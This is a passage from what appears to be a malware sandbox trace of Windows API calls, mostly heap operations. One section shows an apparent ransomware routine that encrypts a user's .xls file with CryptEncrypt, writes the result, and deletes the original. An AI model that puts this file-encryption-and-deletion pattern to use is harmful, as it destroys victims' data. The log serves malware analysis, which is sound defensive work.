hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.250] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.251] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.251] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0080.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0080.251] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.252] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.252] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0080.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb2e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0080.252] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e2e0*=0x16373, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e2e0*=0x16380) returned 1 [0080.252] CharLowerBuffW (in: lpsz="byte[91009]", cchLength=0xb | out: lpsz="byte[91009]") returned 0xb [0080.252] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.252] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0080.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb3c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0080.252] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49dca88*, pdwDataLen=0x144e2e0*=0x16373, dwBufLen=0x16380 | out: pbData=0x49dca88*, pdwDataLen=0x144e2e0*=0x16380) returned 1 [0080.253] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.253] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.253] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.253] WriteFile (in: hFile=0x258, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0x16380, lpNumberOfBytesWritten=0x144ece4, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144ece4*=0x16380, lpOverlapped=0x0) returned 1 [0080.256] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0080.256] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0080.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cafb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0080.256] CryptDestroyKey (hKey=0x41ac600) returned 1 [0080.256] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.256] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.256] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.256] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.256] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.256] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.256] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.256] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0080.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0080.257] CryptReleaseContext (hProv=0x41a4d00, dwFlags=0x0) returned 1 [0080.257] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.257] FreeLibrary (hLibModule=0x756e0000) returned 1 [0080.257] CloseHandle (hObject=0x298) returned 1 [0080.257] CloseHandle (hObject=0x258) returned 1 [0080.294] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\VmdYvxc3Ol-gmt2M.xls", nBufferLength=0x7fff, lpBuffer=0x143ece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\VmdYvxc3Ol-gmt2M.xls", lpFilePart=0x0) returned 0x40 [0080.294] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\VmdYvxc3Ol-gmt2M.xls" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\vmdyvxc3ol-gmt2m.xls")) returned 0x20 [0080.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0080.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0080.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0080.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0080.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0080.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0080.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0080.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0080.295] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\VmdYvxc3Ol-gmt2M.xls", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ee9540, ftCreationTime.dwHighDateTime=0x1d5ea21, ftLastAccessTime.dwLowDateTime=0x94a22970, ftLastAccessTime.dwHighDateTime=0x1d5eebe, ftLastWriteTime.dwLowDateTime=0x94a22970, ftLastWriteTime.dwHighDateTime=0x1d5eebe, nFileSizeHigh=0x0, nFileSizeLow=0x16373, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="VmdYvxc3Ol-gmt2M.xls", cAlternateFileName="VMDYVX~1.XLS")) returned 0x41abfc0 [0080.295] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\VmdYvxc3Ol-gmt2M.xls" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\vmdyvxc3ol-gmt2m.xls")) returned 1 [0080.311] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ee9540, ftCreationTime.dwHighDateTime=0x1d5ea21, ftLastAccessTime.dwLowDateTime=0x94a22970, ftLastAccessTime.dwHighDateTime=0x1d5eebe, ftLastWriteTime.dwLowDateTime=0x94a22970, ftLastWriteTime.dwHighDateTime=0x1d5eebe, nFileSizeHigh=0x0, nFileSizeLow=0x16373, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="VmdYvxc3Ol-gmt2M.xls", cAlternateFileName="VMDYVX~1.XLS")) returned 0 [0080.312] FindClose (in: hFindFile=0x41abfc0 | out: hFindFile=0x41abfc0) returned 1 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0080.312] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0080.312] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0080.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0080.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0080.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0080.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0080.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0080.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e87e8 | out: hHeap=0x1780000) returned 1 [0080.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0080.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0080.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0080.313] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0080.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0080.314] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0080.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0080.314] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0080.314] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0080.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0080.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0080.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0080.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0080.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0080.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0080.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0080.315] 